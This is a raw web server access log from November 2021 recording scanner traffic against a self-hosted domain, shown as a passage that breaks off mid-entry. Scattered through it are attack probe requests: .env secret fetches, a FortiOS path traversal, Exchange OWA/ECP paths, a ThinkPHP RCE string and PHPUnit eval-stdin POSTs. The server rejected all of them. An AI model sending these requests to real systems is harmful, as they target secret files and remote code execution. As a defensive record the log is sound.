"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:13:53:38 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:15:05:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.25] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:16:02:38 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:16:02:38 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:16:47:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [04/Nov/2021:16:56:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Nov/2021:17:03:36 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Nov/2021:17:03:36 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Nov/2021:17:03:36 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Nov/2021:17:03:36 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Nov/2021:17:03:36 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Nov/2021:17:03:36 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Nov/2021:17:15:08 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:17:15:09 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:17:45:26 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Nov/2021:17:45:26 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Nov/2021:17:53:17 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:17:53:17 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:17:55:27 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:17:55:27 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [04/Nov/2021:18:01:02 +0000] 444 - GET https localhost "/" [Client 43.129.36.145] [Length 0] [Gzip -] "curl/7.64.1" "-" [04/Nov/2021:18:01:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 209.141.36.112] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [04/Nov/2021:18:10:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [04/Nov/2021:18:10:58 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [04/Nov/2021:18:10:58 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [04/Nov/2021:18:39:16 +0000] 400 - GET http localhost "/ab2g" [Client 143.110.221.2] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:18:39:18 +0000] 400 - GET http localhost "/ab2h" [Client 143.110.221.2] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:18:53:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 176.58.99.15] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [04/Nov/2021:19:51:40 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 162.240.26.173] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Nov/2021:20:31:37 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Nov/2021:20:45:07 +0000] 400 - - http localhost "-" [Client 89.248.165.100] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:20:59:49 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 181.214.206.72] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "-" [04/Nov/2021:21:12:06 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Nov/2021:21:31:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Nov/2021:22:24:47 +0000] 400 - - https localhost "-" [Client 162.62.133.166] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:23:10:12 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 59.36.168.250] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Nov/2021:23:42:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 170.130.187.26] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [05/Nov/2021:00:06:42 +0000] 400 - HEAD http localhost "/" [Client 192.81.214.73] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:00:06:43 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:43 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:44 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:44 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:44 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:44 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:45 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:45 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:46 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 192.81.214.73] [Length 252] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [05/Nov/2021:00:06:46 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 192.81.214.73] [Length 0] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [05/Nov/2021:00:06:46 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:46 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:47 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:47 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 192.81.214.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:06:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.81.214.73] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Nov/2021:00:08:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Nov/2021:00:15:43 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:00:15:43 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:00:40:15 +0000] 400 - GET http 64.22.31.253 "/dispatch.asp" [Client 23.146.241.135] [Length 252] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2" "-" [05/Nov/2021:00:57:36 +0000] 400 - GET http localhost "/ab2g" [Client 167.172.92.185] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:00:57:37 +0000] 400 - GET http localhost "/ab2h" [Client 167.172.92.185] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:01:22:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:01:52:33 +0000] 444 - GET https 64.22.31.253 "//remote/fgt_lang?lang=/../../../..//////////dev/" [Client 193.107.216.49] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [05/Nov/2021:02:01:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:02:32:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.30] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:03:17:42 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:03:17:43 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:05:18:28 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:05:19:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:05:22:33 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.104.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:05:39:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [05/Nov/2021:05:41:13 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:05:41:13 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:06:35:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [05/Nov/2021:06:50:13 +0000] 400 - GET http localhost "/ab2g" [Client 143.198.32.69] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:06:50:13 +0000] 400 - GET http localhost "/ab2h" [Client 143.198.32.69] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:06:59:45 +0000] 400 - - http localhost "-" [Client 138.68.236.135] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:06:59:46 +0000] 400 - - http localhost "-" [Client 138.68.236.135] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:06:59:46 +0000] 400 - POST http 192.168.204.159 "/" [Client 138.68.236.135] [Length 252] [Gzip -] "WinHttpClient" "-" [05/Nov/2021:06:59:46 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 138.68.236.135] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [05/Nov/2021:07:07:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [05/Nov/2021:07:25:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [05/Nov/2021:07:48:34 +0000] 444 - GET https laravel.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:34 +0000] 444 - GET https api.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:34 +0000] 444 - GET https demo.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:34 +0000] 444 - GET https test.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:34 +0000] 444 - GET https beta.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:34 +0000] 444 - GET https app.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:35 +0000] 444 - GET https admin.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:35 +0000] 444 - GET https dev.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:48:35 +0000] 444 - GET https staging.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:07:52:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [05/Nov/2021:07:56:32 +0000] 400 - GET http 64.22.31.253 "/t4" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [05/Nov/2021:07:58:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Nov/2021:07:59:50 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:07:59:51 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:07:59:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.154.60.61] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:08:26:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [05/Nov/2021:08:28:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:08:29:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [05/Nov/2021:09:25:14 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.198.245] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:09:53:26 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:09:53:26 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:10:54:05 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.83.218.249] [Length 0] [Gzip -] "-" "-" [05/Nov/2021:10:59:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [05/Nov/2021:10:59:54 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211105185740" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [05/Nov/2021:11:17:33 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:11:17:34 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:11:38:38 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.153.76.25] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Nov/2021:12:38:54 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:12:38:55 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Nov/2021:12:40:14 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Nov/2021:13:17:50 +0000] 400 - GET http localhost "/ab2g" [Client 157.230.209.14] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:13:17:50 +0000] 400 - GET http localhost "/ab2h" [Client 157.230.209.14] [Length 154] [Gzip -] "-" "-" [05/Nov/2021:13:24:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.199.15] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Nov/2021:13:37:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [05/Nov/2021:13:37:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [05/Nov/2021:13:38:52 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:52 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:53 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Nov/2021:13:38:53 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 